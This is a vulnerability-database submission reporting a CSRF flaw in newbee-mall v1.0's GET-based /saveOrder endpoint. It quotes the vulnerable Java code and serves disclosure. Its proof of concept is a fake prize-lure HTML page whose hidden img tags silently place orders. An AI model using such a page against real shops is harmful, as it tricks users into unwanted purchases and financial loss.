| タイトル | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| 説明 | # CSRF Vulnerability in Order Creation (Critical Design Flaw)
## Summary
A **critical CSRF vulnerability** exists in the order creation endpoint `/saveOrder`. This endpoint uses a **GET request** to create orders, making it trivially exploitable via simple HTML image tags. Combined with the lack of CSRF protection, attackers can force authenticated users to place orders without their knowledge.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(newBeeMallLoginInterceptor)
.addPathPatterns("/saveOrder");
// ❌ Only session authentication, no CSRF protection
}
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/OrderController.java` (Lines 67-83)
```java
@GetMapping("/saveOrder") // ❌ CRITICAL: GET method for state-changing operation!
public String saveOrder(HttpSession httpSession) {
NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
List<NewBeeMallShoppingCartItemVO> myShoppingCartItems =
newBeeMallShoppingCartService.getMyShoppingCartItems(user.getUserId());
if (!StringUtils.hasText(user.getAddress().trim())) {
NewBeeMallException.fail(ServiceResultEnum.NULL_ADDRESS_ERROR.getResult());
}
if (CollectionUtils.isEmpty(myShoppingCartItems)) {
NewBeeMallException.fail(ServiceResultEnum.SHOPPING_ITEM_ERROR.getResult());
}
// ❌ No CSRF token validation
// ⚠️ Creates order based solely on session cookie
String saveOrderResult = newBeeMallOrderService.saveOrder(user, myShoppingCartItems);
return "redirect:/orders/" + saveOrderResult;
}
```
**Critical Design Flaws**:
1. ❌ Uses GET method for order creation (violates HTTP idempotency principles)
2. ❌ No CSRF token validation
3. ❌ No additional authorization beyond session cookie
4. ⚠️ Can be triggered by simple `<img>` tag
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>???? Congratulations! You've Won!</title>
</head>
<body>
<h1>???? Claim Your Free iPhone 15 Pro Max!</h1>
<p>Click the button below to verify your identity and claim your prize!</p>
<button style="padding: 20px; font-size: 18px; background: #4CAF50; color: white; border: none; cursor: pointer;">
Claim Prize Now!
</button>
<!-- CSRF Attack: Invisible image that triggers order creation -->
<img src="http://localhost:28089/saveOrder" style="display:none;"
onerror="document.body.innerHTML='<h2>Processing... Please wait.</h2>'">
<!-- Alternative: Multiple orders can be placed -->
<img src="http://localhost:28089/saveOrder" style="display:none;">
<img src="http://localhost:28089/saveOrder" style="display:none;">
</body>
</html>
```
## Impact
**Unauthorized order placement leading to financial loss** - Attackers can force users to purchase items in their shopping cart, resulting in unwanted charges and potential financial fraud.
---
**CVSS Score**: 8.1 (High)
|
|---|
| ソース | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/107 |
|---|
| ユーザー | flashzyc (UID 92850) |
|---|
| 送信 | 2026年02月05日 11:49 (4 月 ago) |
|---|
| モデレーション | 2026年02月18日 07:55 (13 days later) |
|---|
| ステータス | 重複 |
|---|
| VulDBエントリ | 346456 [newbee-ltd newbee-mall 迄 a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints クロスサイトリクエストフォージェリ] |
|---|
| ポイント | 0 |
|---|